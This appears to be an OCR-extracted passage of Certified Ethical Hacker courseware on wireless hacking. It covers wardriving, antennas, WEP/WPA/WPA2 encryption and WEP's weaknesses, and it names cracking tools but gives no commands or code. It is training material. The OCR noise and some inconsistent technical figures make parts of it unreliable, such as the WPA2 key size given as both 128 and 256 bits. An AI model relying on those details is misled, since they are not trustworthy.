
Exam 312-50 Certified Ethical Hacker

connection It is used to transmit data on a stable range of the frequency band Data is transmitted on radio carriers which hop pseudo-randomly FHSS through many different frequencies at a pre-determined rate and hopping sequence OFDM Method of encoding digital data on multiple carrier frequencies with multiple overlapping radio frequency carriers TABLE 15.2: Wireless terms and descriptions

DSSS

Module 15 Page 2162

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Wi-Fi C halking
W arW alking
Attackers walk around with Wi-Fi enabled laptops to detect open wireless networks

CEH
W a rFlyin g
In this technique, attackers fly around with Wi-Fi enabled laptops to detect open wireless networks

W a rC h alking
A method used to draw symbols in public places to advertise open Wi-Fi networks

W arD riving
Attackers drive around with Wi-Fi enabled laptops to detect open wireless networks

Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

W i- F i C h a lk in g There are various techniques to detect open wireless networks. They are:

W a r W a lk in g To perform WarWalking, attackers walk around with Wi-Fi enabled laptops to detect open wireless networks. In this technique, the attacker goes on foot to conduct the Wi-Fi chalking. The disadvantage of this approach is the absence of a convenient computing environment and slower speed of travel.

W a r F ly in g (8 3 ) WarFlying is an activity in which attackers fly around with Wi-Fi enabled laptops to detect open wireless networks. This is also known as warstorming. As most of the people usually scan for the networks to map out the wireless networks in the area or as an experiment, most WarFlying is harmless. Also, it is more difficult to access open networks through WarFlying because of the nature of flying.

Module 15 Page 2163

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

W a r D r iv in g According to www.wordspy.com, WarDriving is a computer cracking technique that involves driving through a neighborhood with a wireless enabled notebook computer, mapping houses and businesses that have wireless access points.

W a r C h a lk in g . . 1 This term comes from whackers who use chalk to place a special symbol on a sidewalk or another surface to indicate a nearby wireless network that offers Internet access. It is a method used to draw symbols in public places to advertise open Wi-Fi networks.

Module 15 Page 2164

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Wi-Fi C h alking Sym bols

(•rtifwtf

CEH
IU mjI NMhM

Copyright © by IG-CSUIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

(«•»)

W i ‫־‬F i C h a l k i n g S y m b o l s Wi-Fi chalking symbols are inspired by hobo symbols. Matt Jones designed the set of

icons and publicized them. The following are the various Wi-Fi chalking symbols:

X
Free Wi-Fi

< ^6
Wi-Fi w ith MAC Filtering

< 56
Restricted Wi-Fi

)^

‫י‬

Pay for Wi-Fi

Wi-Fi w ith W PA

Wi-Fi w ith M ultiple Access Controls

Wi-Fi w ith Closed SSID

Wi-Fi Honeypot

F IG U R E 15.10: Various Wi-Fi chalking sym bols

Module 15 Page 2165

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Types of Wireless Antennas
D ire ctio n a l A n te n n a
Used to broadcast and obtain radio waves from a single direction
Unidirectional Antenna

O m n id ire ctio n a l A n te n n a
Omnidirectional antennas provide a 360 degree horizontal radiation pattern. It is used in wireless base stations.

P arabolic G rid A n te n n a
It is based on the principle of a satellite dish but it does not have a solid backing. They can pick up Wi-Fi signals ten miles or more.

Y ag i A n te n n a
Yagi is a unidirectional antenna commonly used in communications fora frequency band of 10 MHz to VHF and UHF

Dipole A n te n n a
Bidirectional antenna, used to support client connections rather than site-tosite applications

Copyright © by EG-G(HIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

T y p e s o f W ir e le s s A n te n n a s Antennas are important for sending and receiving radio signals. They convert electrical impulses into radio signals and vice versa. Basically there are five types of wireless antennas: D ir e c tio n a l A n te n n a ^ A directional antenna is used to broadcast and obtain radio waves from a single direction. In order to improve the transmission and reception the directional antenna is designed to work effectively in a few directions when compared with the other directions. This also helps in reducing interference. O m n id ir e c tio n a l A n te n n a Omnidirectional antennas radiate electromagnetic energy regularly in all directions. They usually radiate strong waves uniformly in two dimensions, but not as strongly in the third. These antennas are efficient in areas where wireless stations use time division multiple access technology. A good example of an omnidirectional antenna is one used by radio stations. These antennas are effective for radio signal transmission because the receiver may not be stationary. Therefore, a radio can receive a signal regardless of where it is.

Module 15 Page 2166

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

(ftb
'

P a r a b o lic G r id A n te n n a A parabolic grid antenna is based on the principle of a satellite dish but it does not have a solid backing. Instead of solid backing this kind of antennas has a semi-dish

that is formed by a grid made of aluminum wire. These grid parabolic antennas can achieve very long distance Wi-Fi transmissions by making use of the principle of a highly focused radio beam. This type of antenna can be used to transmit weak radio signals millions of miles back to earth. (((© ))} Y a g i A n te n n a Yagi is a unidirectional antenna commonly used in communications for a frequency band of 10 MHz to VHF and UHF. It is also called as Yagi Uda antenna. Improving the gain of the antenna and reducing the noise level of a radio signal are the main focus of this antenna. It doesn't only have unidirectional radiation and response pattern, but it concentrates the radiation and response. It consists of a reflector, dipole, and a number of directors. An end fire radiation pattern is developed by this antenna. D ip o le A n te n n a A dipole is a straight electrical conductor measuring half wavelength from end to end and connected at the RF feed line's center. It is also called as a doublet. It is bilaterally symmetrical so it is inherently a balanced antenna. These kinds of antennas are usually fed with a balanced parallel-wire RF transmission line.

Module 15 Page 2167

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

P arabolic G rid A ntenna
Parabolic grid antennas enable attackers to get better signal quality resulting in more data to eavesdrop on, more bandwidth to abuse and higher power output that is essential in Layer 1 DoS and m anin-the-middle attacks

CEH

SSID
Apple M y Wi-Fi GSM Wi-Fi Planet Awslocal

Channel Encryption 2 S 1 6 8 None WEP WEP None None

Authentication Unknown Unknown Unknown Unknown Unknown

Signal 24% 40% 64% 38% 54% j

P a r a b o lic G r id A n te n n a

a

Parabolic grid antennas enable attackers to get better signal quality resulting in more

data to eavesdrop on, more bandwidth to abuse, and higher power output that is essential in Layer 1 DoS and man-in-the-middle attacks. Grid parabolic antennas can pick up Wi-Fi signals from a distance of 10 miles. The design of this antenna saves weight and space and it has the capability of picking up Wi-Fi signals that are either horizontally or vertically polarized.

SSID
Apple My Wi-Fi GSM Wi-Fi Planet Awslocal

Channel Encryption
2 5 1 6 8 None WEP WEP None None

Authentication
Unknown Unknown Unknown Unknown Unknown

Signal
24% 40% 64% 38% 54%

T A BLE 15.4: Various SSID 's and p ercen tage o f signal quality

Module 15 Page 2168

Ethical Hacking and Countermeasures Copyright © by EC-C0l1nCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

M odule Flow

CEH

« b H ‫־‬ ‫־‬

M o d u le F lo w Wireless encryption is a process of protecting the wireless network from attackers

who can collect your sensitive information by breaching the RF (Radio Frequency) traffic. This section provides insight on various wireless encryption standards such as W EP, W PA, WPA2, W E P issues, how to break encryption algorithms, and how to defend against encryption algorithm cracking.

Wireless Concepts

0*

Wireless Encryption

^

W ireless Threats

Wireless Hacking Methodology

Wireless Hacking Tools

^

Bluetooth Hacking

Module 15 Page 2169

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Module 15 Page 2170

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

T y p es o f W ir e le ss E n cry p tio n
WEP
9 WEP is an encryption algorithm for IEEE 802.11 wireless networks 6 It is an old and original wireless security standard which can be cracked easily

C EH

WPA
« It is an advanced wireless encryption protocol using TKIP, MIC, and AES encryption w Uses a 48 bit IV, 32 bit CRC and TKIP encryption for wireless security

WPA2
WPA2 uses AES (128 bit) and CCMP for wireless data encryption

WPA2 Enterprise
It integrates EAP standards with WPA2 encryption

TKIP
A security protocol used in WPA as a replacement for WEP

AES
It is a symmetric-key encryption, used in WPA2 as a replacement of TKIP

EAP
Supports multiple authentication methods, such as token cards, Kerberos, certificates etc.

LEAP
It is a proprietary WLAN authentication protocol developed by Cisco

RADIUS
It is a centralized authentication and authorization management system

802.H i
It is an IEEE amendment that specifies security mechanisms for 802.11 wireless networks

CCMP
CCMP utilizes 128-bit keys, with a 48-bit initialization vector (IV) for replay detection

W ire le ssE n c ry p tio n

%

Copyright © by EC-C(ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

T y p e s o f W ir e le s s E n c r y p tio n The attacks on wireless networks are increasing day by day with the increasing use of wireless networks. Therefore, from this emerging technology have come various types of wireless encryption algorithms to make the wireless network more secure. Each wireless encryption algorithm has advantages and disadvantages. The following are the various wireless encryption algorithms developed so far: 9 W EP: A WLAN clients authenticating and data encryption protocol and it is an old, original wireless security standard that can be cracked easily. Q W PA : It is an advanced WLAN clients authenticating and data encryption protocol using TKIP, MIC, and AES encryption. It uses a 48-bit IV, 32-bit CRC, and TKIP encryption for wireless security. 9 9 9 e W PA2: WPA2 uses AES (128-bit) and CCMP for wireless data encryption. W PA2 Enterprise: It integrates EAP standards with W PA encryption. TKIP: A security protocol used in W PA as a replacement for W EP. AES: It is a symmetric-key encryption, used in WPA2 as a replacement of TKIP.

Module 15 Page 2171

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

9

EAP: Uses multiple authentication methods, such as token cards, Kerberos, certificates, etc.

9 9 9

LEAP: A proprietary WLAN authentication protocol developed by Cisco. RADIUS: A centralized authentication and authorization management system. 802.H i: An IEEE standard that specifies security mechanisms for 802.11 wireless networks.

9

CCMP: CCMP utilizes 128-bit keys, with a 48-bit initialization vector (IV) for replay detection.

Module

15 Page 2172

Ethical Hacking and Countermeasures Copyright © by EC-COUIlCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

WEP E ncryption
W h a t Is W E P ?

CEH
Q WEP uses a 24-bit initialization vector (IV) to form stream cipher RC4 for confidentiality, and the CRC-32 checksum for integrity of wireless transmission

Q

Wired Equivalent Privacy (WEP) is an IEEE 802.11 wireless protocol which provides security algorithms for data confidentiality during wireless transmissions

WEP encryption can be easily cracked

64-bit W EP uses a 40-bit key 128-bit W EP uses a 104-bit key size 256-bit W EP uses 232-bit key size

W E P F la w s
It was developed without: 0 Academic or public review Review from cryptologists

Q

Q

It has significant vulnerabilities and design flaws

Copyright © by EC-C(ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

W E P

E n c r y p tio n

In this section we will discuss W EP encryption as well as its flaws.

W h a t Is W E P E n c r y p tio n ? According to searchsecurity.com, "W ired Equivalent Privacy (W E P ) is a security protocol, specified in the IEEE Wireless Fidelity (Wi-Fi) standard 802.11b." W E P is a component of the IEEE 802.11 W LAN standards. Its primary purpose is to provide confidentiality of data on wireless networks at a level equivalent to that of wired LANs. Physical security can be applied in wired LANs to stop unauthorized access to a network. In a wireless LAN, the network can be accessed without physically connecting to the LAN. Therefore, IEEE utilizes an encryption mechanism at the data link layer for minimizing unauthorized access on WLAN. This is accomplished by encrypting data with the symmetric RC4 encryption algorithm—a cryptographic mechanism used to defend against threats. Role of W E P in Wireless Communication 9 W EP protects from eavesdropping on wireless communications.

Module 15 Page 2173

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

9 9

It minimizes unauthorized access to the wireless network. It depends on a secret key. This key is used to encrypt packetsbefore transmission. A mobile station and an access point share this key. An integrity check is performed to ensure that packets are not altered during transmission. 802.11 W E P encrypts only the data between 802.11 stations.

Main Goals of W E P 9 9 9 9 Confidentiality: It prevents link-layer eavesdropping Access Control: It determines who may access the network andwho Data Integrity: It protects the change of data from a third user Efficiency may not

Key points It was developed without: 9 9 Academic or public review Review from cryptologists

It has significant vulnerabilities and design flaws 9 W E P is a stream cipher that plaintext The length of the W EP and the secret key are: 9 9 9 64-bit W EP uses a 40-bit key 128-bit W EP uses a 104-bit key size 256-bit W EP uses 232-bit key size uses RC-4 to produce a stream of bytes that are XORed with

W E P F la w s Some basic flaws undermine W EP's ability to protect against a serious attack: 1. No defined method for encryption 9 9 2. keydistribution:

Pre-shared keys were set once atinstallation and are rarely (if ever) changed. It is easy to recover the number of plaintext messages encrypted with the same key.

Use of RC4, which was designed to be a one-time cipher and not intended formultiple message use: 9 9 As the pre-shared key is rarely changed, the same key is used over and over.

An attacker monitors the traffic and finds out the different ways to work out with the plaintext message.

9

W ith knowledge of the ciphertext and plaintext, an attacker can compute the key.

Module 15 Page 2174

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

3.

Attackers analyze the traffic from totally passive data captures and crack the W EP keys with the help of tools such as AirSnort, WEPCrack, and dweputils.

4. 5.

Key generators that are used by different vendors are vulnerable for a 40-bit key. Key scheduling algorithms are also vulnerable to attack.

Module 15 Page 2175

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

How WEP W orks

UrtifM IUkjI N M k M

CEH

! WEP-encrypted Packet (MAC Frame)

CRC-32 checksum is used to calculate a 32-bit Integrity Check Value (ICV) for the data, which, in turn, is added to the data frame A 24-bit arbitrary number known as Initialization Vector (IV) is added to WEP encryption key; the WEP key and IV are together called as WEP seed

The WEP seed is used as the input to RC4 algorithm to generate a key stream The key stream is bit-wise XORed with the combination of data and ICVto produce the encrypted data The IV is added to the encrypted data and ICV to generate a MAC frame

Copyright © by EC-C(ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

H o w W E P

W o rk s

To encrypt the payload of an 802.11 frame, the W EP encryption uses the following procedure: 9 9 9 0 A 32-bit Integrity Check Value (ICV) is calculated for the frame data. The ICV is appended to the end of the frame data. A 24-bit Initialization Vector (IV) is generated and appended to the W EP encryption key. The combination of IV and the W EP key is used as the input to RC4 algorithm to generate a key stream. The length of the stream should be same as the combination of ICV and data. Q The key stream is bit-wise XORed with the combination of data and ICV to produce the encrypted data that is sent between the client and the AP. 9 The IV is added to the encrypted combination of data and ICV along with other fields, to generate a MAC frame.

Module 15 Page 2176

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

W EPKey

Store (Kl,

K2, K3, K4)

■ .........>
‫ י‬W EP Seed
‫־־־־‬ ■ ••••?......* 1 .............. * toA

i
■ ■ ............

■‫ך‬

W E P K ey

•y

K e y stre a m

>

IV : 1 • .......... ▲ ...... :

PAD

KID

C ip h e rtex t

‫־‬ I

I

W E P - e n c ry p te d P a c k e t (M A C F ra m e )

FIGURE 15.11: WEP encryption process for encrypting the payload of an 802.11 frame

Module 15 Page 2177

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

W hat IsWPA?
0

CEH
0

J Wi-Fi Protected Access (WPA) is a data encryption method for WLANs based on 802.11 standards J A snapshot of 802.Hi under development providing stronger encryption, and enabling PSK or EAP authentication

_ 0

0

TKIP (Temporal Key Integrity Protocol)

W P A Enhances W E P

TKIP utilizes the RC4 stream cipher encryption with 128-bit keys and 64bit M IC integrity check TKIP mitigated vulnerability by increasing the size of the IV and using mixing functions 128-bit Temporal Key

TKIP enhances W E P by adding a rekeying mechanism to provide fresh encryption and integrity keys Temporal keys are changed for every 10,000 packets. This makes TKIP protected networks more resistant to cryptanalytic attacks involving key reuse

S Under TKIP, the client starts with a 128-bit "temporal key" (TK) that is then combined with the client's MAC address and with an IV to create a keystream that is used to encrypt data via the RC4 S It implements a sequence counter to protect against replay attacks

Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

W h a t Is W P A ? W PA stands for Wi-Fi Protected Access. It is compatible with the 802.H i security standard. It is a software upgrade, but may also require a hardware upgrade. In the past, the primary security mechanism used between wireless access points and wireless clients was W EP encryption. The major drawback for W E P encryption is that it still uses a static encryption key. The attacker can exploit this weakness by using tools that are freely available on the Internet. The Institute of Electrical and Electronics Engineers (IEEE) has defined "an expansion to the 802.11 protocols that can allow for increased security." Nearly every Wi-Fi company has decided to employ a standard for increased security called Wi-Fi Protected Access. Data encryption security is increased in W PA as messages are passed through Message Integrity Check (MIC) using the Temporal Key Integrity Protocol (TKIP) to enhance data encryption. The unicast traffic changes the encryption key after every frame using TKIP. The key used in TKIP changes with every frame, and is automatically coordinated between the wireless client and the access point. Q TKIP (Temporal Key Integrity Protocol): TKIP utilizes the RC4 stream cipher encryption with 128-bit keys and 64-bit keys for authentication. TKIP mitigates the W EP key derivation vulnerability by not reusing the same Initialization Vector.

e

128-bit Temporal Key: Under TKIP, the client starts with a 128-bit "temporal key" (TK) that is then combined with the client's MAC address and with an IV to create a key that

Module 15 Page 2178

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

is used to encrypt data via the RC4. It implements a sequence counter to protect against replay attacks. 9 W P A Enhances W EP: TKIP enhances W EP by adding a rekeying mechanism to provide fresh encryption and integrity keys. Temporal keys are changed for every 10,000 packets. This makes TKIP protected networks more resistant to cryptanalytic attacks involving key reuse.

Module 15 Page 2179

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

How WPA Works
Data to Transmit MSDU Key Mixing • • > MIC key MSDU +MIC

CEH

V WEP seed /

...
...

y

CRC-32 C hecksum :

,

XOR Algorithm ..... Keystream

Mac Header

ta

KID

| q |

Ciphertext

Packet to transmit

8

Temporal encryption key, transmit address, and TKIP sequence counter (TSC) is used as input to RC4 algorithm to generate a Keystream MAC Service Data Unit (MSDU) and message integrity check (MIC) are combined using Michael algorithm

0

A 32-bit Integrity Check Value (ICV) is calculated for the MPDU

‫ט‬

The combination of M PDU and ICV is bitwise XORed with Keystream to produce the encrypted data The IV is added to the encrypted data to generate MAC frame

‫ט‬

The combination of MSDU and MIC is fragmented to generate MAC Protocol Data Unit (MPDU)

«

Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

H o w W P A

W o rk s

To encrypt the payload effectively, the W P A encryption performs the following steps: 9 Temporal encryption key, transmit address, and TKIP sequence counter (TSC) is used as input to RC4 algorithm to generate a key stream. 0 MAC Service Data Unit (M SDU) and message integrity check (MIC) are combined using the Michael algorithm. 9 The combination of MSDU and MIC is fragmented to generate MAC Protocol Data Unit (M PD U). © A 32-bit Integrity Check Value (ICV) is calculated for the MPDU. 9 The combination of MPDU and ICV is bitwise XORed with a key stream to produce the encrypted data. 9 The IV is added to the encrypted data to generate MAC frame.

The following diagram illustrates the W PA working process:

Module 15 Page 2180

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Data to Transmit
Temporal Encryption Key

Packet to transmit

FIGURE 15.12: Showing the working process of WPA

Module 15 Page 2181

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

T em poral Keys
In W P A and W PA 2, the encryption keys (tem poral keys) are derived during the four-w ay hand shake

Encryption keys are derived from the P M K that is derived during the EAP a u th e n tica tio n session

In the EAP success message, PM K is sent to the AP but is not directed to the Wi-Fi client as it has derived its own copy of the PMK

J J J J

AP sends an ANonce to client which uses it to construct the Pairwise Transient Key (PTK) Client respond with its own nonce-value (SNonce) to the AP together with a Message Integrity Code (MIC) AP sends the GTK and a sequence number together with another MIC which is used in the next broadcast frames Client confirm that the temporal keys are installed Copyright © by EG-ClUIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

T e m p o ra l K e y s For providing privacy to a Wireless LAN over a local RF broadcast network, encryption is a necessary component. Initially W EP is used as the basic or fundamental encryption mechanism but as the flaws are found with the W EP encryption, a new enhanced encryption mechanism, i.e., W PA is used. All the newly deployed equipment is using either TKIP (W PA ) or AES (WPA2) encryption to ensure the WLAN security. In case of W E P encryption mechanism, encryption keys (Temporal Keys) are derived from the PM K (Pairwise M aster Key) that is derived during the EAP authentication session, whereas the encryption keys are derived during the four-way handshake in W PA and WPA2 encryption mechanisms. The method used to derive the encryption keys (temporal keys) is described by the four-way handshake process. Following diagram explains the four-way handshaking process. 9 The AP sends an EAPOL-key frame containing an authenticator nonce (ANonce) to client which uses it to construct the Pairwise Transient Key (PTK). Q Client respond with its own nonce-value (SNonce) to the AP together with a Message Integrity Code (MIC) 9 AP sends the GTK and a sequence number together with another MIC which is used in the next broadcast frames. 9 Client confirms that the temporal keys are installed.

Module 15 Page 2182

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Module 15 Page 2183

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

W hat Is WPA2?
WPA2 provides enterprise and Wi-Fi users with stronger data protection and network access control

CEH

Provides government grade security by implementing the National Institute of Standards and Technology (NIST) FIPS 140-2 compliant AES encryption algorithm

WPA2-Personal
S WPA2-Personal uses a set-up password (Pre-shared Key, PSK)to protect unauthorized network access In PSK mode each wireless network device encrypts the network traffic using a 1 2 8bit key that is derived from a passphrase of to 63 ASCII characters

WPA2-Enterprise
It includes EAP or RADIUS for centralized client authentication using multiple authentication methods, such as token cards, Kerberos, certificates etc. Users are assigned login credentials by a centralized server which they must present when connecting to the network

_

8

Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction Is Strictly Prohibited.

W h a t Is W P A 2 ? W PA2 (Wi-Fi Protected Access 2) is compatible with the 802.l l i standard. It supports most of the security features that are not supported by W PA. It provides stronger data protection and network access control. It gives a high level of security, so that only authorized users can access it. WPA2 provides enterprise and Wi-Fi users with stronger data protection and network access control. It implements the National Institute of Standards and Technology (NIST) FIPS 140-2 compliant AES encryption algorithm and gives government-grade security. W PA 2 offers two modes of operation: 9 WPA-Personal: This version makes use of a setup password (pre-shared key, PSK) and protects unauthorized network access. In PSK mode each wireless network device encrypts the network traffic using a 256 bit key which can be entered as a passphrase of 8 to 63 ASCOO characters. 9 WPA-Enterprise: This confirms the network user through a server. It includes EAP or RADIUS for centralized client authentication using multiple authentication methods, such as token cards, Kerberos, certificates etc. Users are assigned login credentials by a centralized server which they must present when connecting to the network.

Module 15 Page 2184

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

HowWPA2 Works
Priority destination address PN Temporal key Plaintext data

CEH

X

*

V
Nonce

V
AES • > CCMP

&

.............. ............... .... ................ . . . y ...........

MAC header

CCMP header

Encrypted data

Encrypted MIC

WPA2 MAC Frame

J

In th e C C M P im plem entation of W PA 2 , M A C he ad er d ata is used to build additional authentication data (AAD)

j

AAD, tem poral key and nonce along w ith CC M P are used for data encryption A UIDA ■ ‫ ל‬p \,1 A/ —r-— — - : . K D A w p a z m a c Fram e is Dun□ using m a c neaaer, CCM P header, encrypted data and encrypted M IC

h A A

A

J

A sequenced packet n u m b e r (P N ) is used to build nonce

Copyright © by EG-G(HIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

r ‫ >> ־‬H o w W P A 2 W o r k s

> In the CCMP procedure, additional authentication data (AAD) is taken from the MAC
header and included in the CCM encryption process. This protects the frame against alteration of the non-encrypted portions of the frame. A sequenced packet number (PN) is included in the CCMP header to protect against replay attacks. The PN and portions of the MAC header are used to generate a nonce that in turn is used by the CCM encryption process.

Module 15 Page 2185

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Priority destination address MAC header Temporal key Plaintext data

AAD

....... V .....V ..... V ....
M AC header CCMP header Encrypted data Encrypted M IC W PA 2 MAC Frame

FIGURE 15.14: Working of WPA2

Module 15 Page 2186

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

W EPvs.W PAvs.W PA2
Encryption
o =
WEP WPA WPA2

CEH

Attributes
Encryption Algorithm
RC4 RC4, TKIP AES-CCMP

IV Size
24-bits 48-bit 48-bit

Encryption Key Length
40/104-bit 128-bit 128-bit

Integrity Check Mechanism
CRC-32 Michael algorithm and CRC-32 CBC-MAC

1 1

L

J

-----------------------------------------------------------------‫׳‬T> Should be replaced with more secure WPA and WPA2 W EP WPA, WPA2
Incorporates protection against forgery and replay attacks

Copyright © by EC-C(ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

W E P vs. W P A

vs. W P A 2

W EP's primary purpose is to provide confidentiality of data on wireless networks at a level equivalent to that of wired LANs, but it is weak and fails to meet any of its goals. It is a data encryption method for 802.11 WLANs. W PA fixes most of W EP's problems but adds some new vulnerability. WPA2 is expecting to make wireless networks as secure as wired networks. It guarantees the network administrators that only authorized users can access the network. If you are using W EP, then you should replace it with either W PA or WPA2 in order to secure your network or communication over Wi-Fi network. Both W PA and WPA2 incorporate protection against forgery and replay attacks.

Encryption Encryption Algorithm W EP W PA RC4 RC4, TKIP

Attributes IV Size Encryption Key Length 24-bit 48-bit 40/104-bit 128-bit Integrity Check Mechanism CRC-32 Michael algorithm and CRC-32

Module 15 Page 2187

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

W PA 2

AES-CCMP

48-bit

128-bit

AES-CCMP

TABLE 15.5: Com parison between WEP, WPA and WPA2

Module 15 Page 2188

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

WEP Issu es
The IV is a 24-bit field is too small and is sent in the cleartext portion of a message No defined method for encryption key distribution

Identical key streams are produced with the reuse of the same IV for data protection, as the IV is short key streams are repeated within short time

Wireless adapters from the same vendor may all generate the same IV sequence. This enables attackers to determine the key stream and decrypt the ciphertext

Lack of centralized key management makes it difficult to change the W E P keys with any regularity

Associate and disassociate messages are not authenticated

When there is IV Collision, it becomes possible to reconstruct the RC4 keystream based on the IV and the decrypted payload of the packet

WEP does not provide cryptographic integrity protection. By capturing two packets an attacker can flip a bit in the encrypted stream and modify the checksum so that the packet is accepted

IV is a part of the RC4 encryption key, leads to a analytical attack that recovers the key after intercepting and analyzing a relatively small amount of traffic

W E P is based on a password, prone to password cracking attacks

Use of RC4 was designed to be a one-time cipher and not intended for multiple message use

An attacker can construct a decryption table of the reconstructed key stream and can use it to decrypt the W EP Packets in real-time

Copyright © by EC-C(nncil. All Rights Reserved. Reproduction is Strictly Prohibited.

W E P

Is s u e s

€■
1. e

W EP has the following issues: CRC32 is not sufficient to ensure complete cryptographic integrity of a packet: By capturing two packets, an attacker can reliably flip a bit in the encrypted stream, and modify the checksum so that the packet is accepted

2.

IVs are 24 bits: e An AP broadcasting 1500 byte packets at 11 Mb/s would exhaust the entire IV Space in five hours

3.

Known plaintext attacks: Q W hen there is an IV collision, it becomes possible to reconstruct the RC4 keystream based on the IV and the decrypted payload of the packet

4.

Dictionary attacks: e W EP is based on a password

Module 15 Page 2189

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

6

The small space of the initialization vector allows the attacker to create a decryption table, which is a dictionary attack

5.

Denial of services: e Associate and disassociate messages are not authenticated

6.

Eventually, an attacker can construct a decryption table of reconstructed key streams: e W ith about 24 GB of space, an attacker can use this table to decrypt W E P packets in real-time

